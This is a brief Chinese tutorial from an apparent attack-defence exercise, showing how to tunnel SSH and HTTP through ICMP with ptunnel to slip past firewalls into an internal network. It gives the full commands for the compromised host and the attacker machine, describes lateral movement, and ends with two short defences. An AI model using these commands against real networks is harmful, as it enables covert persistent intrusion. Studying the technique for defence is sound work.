观天ICMP(Internet Control Message Protocol),Internet控制报文协议,工作在网络层,ICMP包含ping 、tracert 。
防火墙一般不会去拦截ICMP协议,攻击者、攻击队利用ICMP隧道技术出网。
ICMP隧道能绕过防火墙和安全设备从外部对内网主机进行持续远控。
利用 ICMP的data字段,通过改变data内容。在ICMP内封装TCP,SOCKS,SSH,HTTP。
通过抓包可以看到data字段里面的内容。包含攻击者
攻防环境演练,真实环境中也是一样:攻击内网目标 172.16.1.11或别的网段
一、失陷主机即是被攻击者拿下的主机,运行 :
ptunnel -x 隧道密码 xiaolan@1234
二、攻击机上运行:
sudo ptunnel -p 10.2.1.103 -lp 9999 -da 172.16.1.11 -dp 22 -x xiaolan@1234 //懒得解释自己看图
三、反弹shell或端口转发到攻击机上。进行攻击。内网横向移动。攻击机访问自己的http://127.0.0.1相当于访问内网172.16.1.11受害者,ssh也如此。
ssh root@127.0.0.1 -p 9999 //连接内网172.16.1.11的ssh或http都可以,http需要使用浏览器http://127.0.0.1:80
除此ICMP隧道以外,DNS隧道、http隧道也是一样威胁大。
防御:
(1)关键时期禁止ICMP或ICMP的ping出网。或单台服务器自身系统防火墙禁止
(2)ping速度和发包限制。
